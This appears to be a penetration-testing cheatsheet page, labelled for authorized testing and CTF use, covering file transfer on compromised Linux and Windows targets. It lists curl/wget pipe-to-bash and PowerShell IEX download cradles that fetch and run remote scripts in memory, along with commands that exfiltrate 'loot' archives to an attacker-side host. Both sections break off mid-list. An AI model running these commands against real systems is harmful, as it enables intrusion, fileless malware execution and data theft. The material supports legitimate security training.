File Transfers

Linux File Transfer Cheatsheet Default Ports: HTTP 80/tcp · SSH/SCP 22/tcp · FTP 21/tcp · SMB 445/tcp · TFTP 69/udp “Download” = pulling a file onto the Linux target. “Upload” = exfiltrating off it. For authorized testing, CTFs, and lab use only. wget / curl — Download wget http://10.10.14.5/file -O /tmp/file wget -q http://10.10.14.5/file -O /tmp/file # quiet curl http://10.10.14.5/file -o /tmp/file curl -s http://10.10.14.5/file -o /tmp/file # silent # Ignore TLS cert errors wget --no-check-certificate https://10.10.14.5/file -O /tmp/file curl -k https://10.10.14.5/file -o /tmp/file # Fileless — pipe straight into a shell (verify before doing this) curl -s http://10.10.14.5/s.sh | bash wget -qO- http://10.10.14.5/s.sh | bash wget / curl — Upload (Exfil) # POST a file to an upload-capable listener curl -X POST -F 'file=@/tmp/loot.tar' http://10.10.14.5/upload curl -T /tmp/loot.tar http://10.10.14.5/loot.tar # PUT wget --post-file=/tmp/loot.tar http://10.10.14.5/upload Attacker-side upload server: ...

Windows File Transfer Cheatsheet Default Ports: SMB 445/tcp · HTTP 80/tcp · FTP 21/tcp · WinRM 5985/5986 “Download” = pulling a file onto the Windows target. “Upload” = exfiltrating off it. For authorized testing, CTFs, and lab use only. PowerShell — Download # Download to disk Invoke-WebRequest -Uri http://10.10.14.5/file.exe -OutFile C:\Windows\Temp\file.exe iwr http://10.10.14.5/file.exe -OutFile file.exe # alias # Legacy / faster (no progress bar overhead) (New-Object Net.WebClient).DownloadFile('http://10.10.14.5/file.exe','C:\Temp\file.exe') # Fileless — execute in memory, nothing touches disk IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.5/script.ps1') (New-Object Net.WebClient).DownloadString('http://10.10.14.5/s.ps1') | IEX iex (iwr http://10.10.14.5/s.ps1 -UseBasicParsing) If Invoke-WebRequest hangs, add -UseBasicParsing (no IE engine dependency). ...